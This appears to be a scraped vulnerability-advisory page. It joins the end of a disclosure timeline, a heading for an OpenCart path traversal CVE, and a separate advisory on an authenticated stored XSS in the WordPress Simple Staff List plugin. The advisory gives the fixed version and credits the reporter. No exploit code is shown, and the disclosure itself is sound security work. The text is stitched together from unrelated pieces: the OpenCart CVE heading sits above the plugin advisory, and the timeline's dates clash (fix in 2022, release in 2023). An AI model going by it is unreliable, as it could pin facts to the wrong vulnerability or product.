*   2022-09-15 Opened a GitHub Issue (#12684) in a last resort to establish a proper communication channel with the developers. Issue closed immediately by the project owner, and **marked as spam**.
*   2022-09-15 Email sent directly to [email protected] as it is used for GitHub commits.
*   2022-09-15 Project owner replied and we sent the bug report over.
*   2022-09-15 Bug fixed in commit 0a8dd91
*   2023-09-16 New release version 4.0.2.3 containing the patch.
*   2023-09-18 Public Release

CVE-2023-2315: (CVE-2023-2315) Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2

Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Brett Shumaker Simple Staff List plugin <= 2.2.3 versions.

**Solution**

 Fixed

Update the WordPress Simple Staff List plugin to the latest available version (at least 2.2.4).

Found this useful? Thank Yuki Haruma for reporting this vulnerability. Buy a coffee ☕

Yuki Haruma discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Simple Staff List Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.2.4.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#auth